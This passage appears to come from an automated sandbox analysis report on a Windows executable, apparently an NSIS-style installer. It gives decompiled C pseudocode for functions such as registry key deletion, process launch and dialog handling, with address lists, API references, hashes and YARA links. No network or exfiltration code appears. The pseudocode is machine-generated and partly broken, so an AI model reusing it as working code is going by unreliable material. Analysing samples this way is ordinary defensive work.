						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73752D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73752E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73752D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                                        0x73751837
                                                                                                        0x73751841
                                                                                                        0x7375184a
                                                                                                        0x7375184d
                                                                                                        0x73751852
                                                                                                        0x7375185b
                                                                                                        0x73751864
                                                                                                        0x73751866
                                                                                                        0x7375186d
                                                                                                        0x7375186f
                                                                                                        0x73751872
                                                                                                        0x73751876
                                                                                                        0x73751882
                                                                                                        0x7375188b
                                                                                                        0x73751890
                                                                                                        0x73751893
                                                                                                        0x73751899
                                                                                                        0x73751899
                                                                                                        0x7375189c
                                                                                                        0x7375189f
                                                                                                        0x737518a2
                                                                                                        0x73751968
                                                                                                        0x73751968
                                                                                                        0x7375196b
                                                                                                        0x737519e5
                                                                                                        0x737519e9
                                                                                                        0x737519f8
                                                                                                        0x737519fb
                                                                                                        0x73751a03
                                                                                                        0x73751a03
                                                                                                        0x73751a03
                                                                                                        0x73751a05
                                                                                                        0x73751a05
                                                                                                        0x73751a06
                                                                                                        0x73751a06
                                                                                                        0x73751a08
                                                                                                        0x73751a0a
                                                                                                        0x73751a10
                                                                                                        0x73751a19
                                                                                                        0x73751a2a
                                                                                                        0x73751a35
                                                                                                        0x73751a35
                                                                                                        0x737519fd
                                                                                                        0x737519e0
                                                                                                        0x737519e0
                                                                                                        0x737519e2
                                                                                                        0x737519e2
                                                                                                        0x00000000
                                                                                                        0x737519e2
                                                                                                        0x737519ff
                                                                                                        0x73751a01
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73751a01
                                                                                                        0x737519ed
                                                                                                        0x737519f1
                                                                                                        0x00000000
                                                                                                        0x737519f1
                                                                                                        0x7375196d
                                                                                                        0x7375196d
                                                                                                        0x7375196e
                                                                                                        0x737519d7
                                                                                                        0x737519d9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737519db
                                                                                                        0x737519de
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737519de
                                                                                                        0x73751970
                                                                                                        0x73751970
                                                                                                        0x73751971
                                                                                                        0x737519aa
                                                                                                        0x737519ae
                                                                                                        0x737519ca
                                                                                                        0x737519cd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737519cf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737519d1
                                                                                                        0x737519d3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737519d5
                                                                                                        0x737519b0
                                                                                                        0x737519b4
                                                                                                        0x737519b6
                                                                                                        0x737519b8
                                                                                                        0x737519ba
                                                                                                        0x737519c3
                                                                                                        0x737519bc
                                                                                                        0x737519bc
                                                                                                        0x737519bc
                                                                                                        0x00000000
                                                                                                        0x737519ba
                                                                                                        0x73751973
                                                                                                        0x73751973
                                                                                                        0x73751976
                                                                                                        0x737519a3
                                                                                                        0x737519a5
                                                                                                        0x00000000
                                                                                                        0x737519a5
                                                                                                        0x73751978
                                                                                                        0x73751978
                                                                                                        0x7375197b
                                                                                                        0x7375198b
                                                                                                        0x7375198f
                                                                                                        0x7375199c
                                                                                                        0x7375199e
                                                                                                        0x00000000
                                                                                                        0x7375199e
                                                                                                        0x73751991
                                                                                                        0x73751993
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73751995
                                                                                                        0x73751998
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375199a
                                                                                                        0x7375197e
                                                                                                        0x7375197f
                                                                                                        0x73751985
                                                                                                        0x73751987
                                                                                                        0x73751987
                                                                                                        0x00000000
                                                                                                        0x7375197f
                                                                                                        0x737518a8
                                                                                                        0x73751920
                                                                                                        0x73751922
                                                                                                        0x73751925
                                                                                                        0x73751943
                                                                                                        0x73751946
                                                                                                        0x7375194c
                                                                                                        0x73751951
                                                                                                        0x73751927
                                                                                                        0x73751927
                                                                                                        0x7375192b
                                                                                                        0x7375192f
                                                                                                        0x73751931
                                                                                                        0x73751931
                                                                                                        0x73751954
                                                                                                        0x73751957
                                                                                                        0x00000000
                                                                                                        0x7375195d
                                                                                                        0x7375195d
                                                                                                        0x73751960
                                                                                                        0x00000000
                                                                                                        0x73751960
                                                                                                        0x73751957
                                                                                                        0x737518aa
                                                                                                        0x737518ad
                                                                                                        0x73751911
                                                                                                        0x73751913
                                                                                                        0x73751915
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375191b
                                                                                                        0x737518af
                                                                                                        0x737518b2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737518b4
                                                                                                        0x737518b5
                                                                                                        0x737518eb
                                                                                                        0x737518ef
                                                                                                        0x73751907
                                                                                                        0x73751909
                                                                                                        0x00000000
                                                                                                        0x73751909
                                                                                                        0x737518f1
                                                                                                        0x737518f3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x737518f9
                                                                                                        0x737518fc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73751902
                                                                                                        0x737518b7
                                                                                                        0x737518ba
                                                                                                        0x737518e1
                                                                                                        0x00000000
                                                                                                        0x737518bc
                                                                                                        0x737518bc
                                                                                                        0x737518bd
                                                                                                        0x737518d1
                                                                                                        0x737518d3
                                                                                                        0x737518bf
                                                                                                        0x737518c1
                                                                                                        0x737518c7
                                                                                                        0x737518c9
                                                                                                        0x737518c9
                                                                                                        0x737518c1
                                                                                                        0x00000000
                                                                                                        0x737518bd

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FreeGlobal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2979337801-0
                                                                                                        • Opcode ID: 32085f8371d6b8eb8cc190ff1c7a19c618964ddbe9614849a6cd9e7097a4ad75
                                                                                                        • Instruction ID: ca98d1a6bc396f33aa5602606383cd2263f3938f4b2846119b9a0fba15eef47e
                                                                                                        • Opcode Fuzzy Hash: 32085f8371d6b8eb8cc190ff1c7a19c618964ddbe9614849a6cd9e7097a4ad75
                                                                                                        • Instruction Fuzzy Hash: 9D510732D041D8AFEF1F9FB4C9847AEBBBAAB44257F18415AF407E3184C73169419751
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                                                                                                        0x00402a57
                                                                                                        0x00402a5f
                                                                                                        0x00402a87
                                                                                                        0x00402a71
                                                                                                        0x00402ac1
                                                                                                        0x00402ac7
                                                                                                        0x00000000
                                                                                                        0x00402ac9
                                                                                                        0x00402a85
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402a85
                                                                                                        0x00402a9c
                                                                                                        0x00402aa4
                                                                                                        0x00402aab
                                                                                                        0x00402ad7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402adf
                                                                                                        0x00402ae7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402ae7
                                                                                                        0x00000000
                                                                                                        0x00402aba
                                                                                                        0x00402ace

                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1912718029-0
                                                                                                        • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                        • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                                        • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                        • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                        0x00401ccb
                                                                                                        0x00401cd2
                                                                                                        0x00401d01
                                                                                                        0x00401d09
                                                                                                        0x00401d10
                                                                                                        0x00401d10
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 00401CC5
                                                                                                        • GetClientRect.USER32 ref: 00401CD2
                                                                                                        • LoadImageA.USER32 ref: 00401CF3
                                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1849352358-0
                                                                                                        • Opcode ID: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                                        • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                                        • Opcode Fuzzy Hash: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                                        • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B88(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B88(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B88(_t34, 0, 0x4204a0, 0x4204a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x4204a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}













                                                                                                        0x004046f9
                                                                                                        0x004046fd
                                                                                                        0x00404705
                                                                                                        0x00404708
                                                                                                        0x00404709
                                                                                                        0x0040470b
                                                                                                        0x0040470d
                                                                                                        0x00404710
                                                                                                        0x00404710
                                                                                                        0x00404717
                                                                                                        0x0040471d
                                                                                                        0x0040471d
                                                                                                        0x00404724
                                                                                                        0x0040472f
                                                                                                        0x00404730
                                                                                                        0x00404733
                                                                                                        0x00404733
                                                                                                        0x00404740
                                                                                                        0x0040474b
                                                                                                        0x0040474e
                                                                                                        0x00404760
                                                                                                        0x00404767
                                                                                                        0x00404768
                                                                                                        0x00404777
                                                                                                        0x00404787
                                                                                                        0x004047a3

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                                        • wsprintfA.USER32 ref: 00404787
                                                                                                        • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                        • String ID: %u.%u%s%s
                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                        • Opcode ID: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                        • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                                        • Opcode Fuzzy Hash: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                        • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                        0x00401bb6
                                                                                                        0x00401bc2
                                                                                                        0x00401bc5
                                                                                                        0x00401bce
                                                                                                        0x00401bce
                                                                                                        0x00401bd1
                                                                                                        0x00401bd5
                                                                                                        0x00401bde
                                                                                                        0x00401bde
                                                                                                        0x00401be1
                                                                                                        0x00401be5
                                                                                                        0x00401be7
                                                                                                        0x00401c34
                                                                                                        0x00401c36
                                                                                                        0x00401c3f
                                                                                                        0x00401c47
                                                                                                        0x00401c4a
                                                                                                        0x00401c4a
                                                                                                        0x00401c53
                                                                                                        0x00000000
                                                                                                        0x00401be9
                                                                                                        0x00401bf0
                                                                                                        0x00401bf2
                                                                                                        0x00401bfa
                                                                                                        0x00401bfd
                                                                                                        0x00401c25
                                                                                                        0x00401c59
                                                                                                        0x00401c59
                                                                                                        0x00401bff
                                                                                                        0x00401c0d
                                                                                                        0x00401c15
                                                                                                        0x00401c18
                                                                                                        0x00401c18
                                                                                                        0x00401bfd
                                                                                                        0x00401c5c
                                                                                                        0x00401c5f
                                                                                                        0x00401c65
                                                                                                        0x00402833
                                                                                                        0x00402833
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Timeout
                                                                                                        • String ID: !
                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                        • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                        • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                                        • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                        • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                        0x004053cf
                                                                                                        0x004053eb
                                                                                                        0x004053f3
                                                                                                        0x004053f8
                                                                                                        0x00000000
                                                                                                        0x004053fe
                                                                                                        0x00405402

                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004053F8
                                                                                                        Strings
                                                                                                        • Error launching installer, xrefs: 004053D9
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                        • API String ID: 3712363035-2984075973
                                                                                                        • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                        • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                                        • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                        • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405659(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                        0x0040565a
                                                                                                        0x00405671
                                                                                                        0x00405679
                                                                                                        0x00405679
                                                                                                        0x00405681

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
                                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
                                                                                                        • lstrcatA.KERNEL32(?,00409010), ref: 00405679
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405659
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 2659869361-3916508600
                                                                                                        • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                        • Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
                                                                                                        • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                        • Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
